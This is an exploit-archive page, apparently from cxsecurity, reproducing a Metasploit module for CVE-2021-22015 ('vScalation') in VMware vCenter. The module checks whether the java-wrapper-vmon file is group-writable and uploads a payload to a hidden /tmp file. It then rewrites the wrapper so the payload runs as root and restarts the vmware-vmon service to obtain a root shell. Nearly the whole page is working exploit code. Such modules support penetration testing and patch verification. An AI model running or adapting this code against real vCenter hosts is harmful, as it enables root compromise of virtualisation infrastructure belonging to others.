VMware vCenter vScalation Privilege Escalation

Credit: h00die
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Post::Linux::Priv include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'VMware vCenter vScalation Priv Esc', 'Description' => %q{ This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the cis group to write to the file, which will execute as root on vmware-vmon service restart or host reboot. This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488. The following versions should be vulnerable: vCenter 7.0 before U2c vCenter 6.7 before U3o vCenter 6.5 before U3q }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Yuval Lazar' # original PoC, analysis ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'URL', 'https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/' ], [ 'CVE', '2021-22015' ], [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html' ] ], 'DisclosureDate' => '2021-09-21', 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 1800 # 30min }, 'Notes' => { 'Stability' => [CRASH_SERVICE_DOWN], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS], 'AKA' => ['vScalation'] } ) ) register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end # Simplify pulling the writable directory variable def base_dir datastore['WritableDir'].to_s end def java_wrapper_vmon '/usr/lib/vmware-vmon/java-wrapper-vmon' end def check group_owner = cmd_exec("stat -c \"%G\" \"#{java_wrapper_vmon}\"") if writable?(java_wrapper_vmon) && group_owner == 'cis' return CheckCode::Appears("#{java_wrapper_vmon} is writable and owned by cis group") end CheckCode::Safe("#{java_wrapper_vmon} not owned by 'cis' group (owned by '#{group_owner}'), or not writable") end def exploit # Check if we're already root if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' end # Make sure we can write our exploit and payload to the local system unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end # backup the original file @backup = read_file(java_wrapper_vmon) path = store_loot( 'java-wrapper-vmon.text', 'text/plain', rhost, @backup, 'java-wrapper-vmon.text' ) print_good("Original #{java_wrapper_vmon} backed up to #{path}") # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" print_status("Writing payload to #{payload_path}") upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup payload_path # write trojaned file # we want to write our payload towards the top to ensure it gets run # writing it at the bottom of the file results in the payload not being run print_status("Writing trojaned #{java_wrapper_vmon}") write_file(java_wrapper_vmon, @backup.gsub('#!/bin/sh', "#!/bin/sh\n#{payload_path} &\n")) # try to restart the service print_status('Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)') service_restart = cmd_exec('systemctl restart vmware-vmon.service') # one error i'm seeing when using vsphere-client is: Failed to restart vmware-vmon.service: The name org.freedesktop.PolicyKit1 was not provided by any .service files if service_restart.downcase.include?('access denied') || service_restart.downcase.include?('failed') print_bad('vmware-vmon service needs to be restarted, or host rebooted to obtain shell.') end print_status("Waiting #{datastore['WfsDelay']} seconds for shell") end def cleanup unless @backup.nil? print_status("Replacing trojaned #{java_wrapper_vmon} with original") write_file(java_wrapper_vmon, @backup) end super end end

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com


Back to Top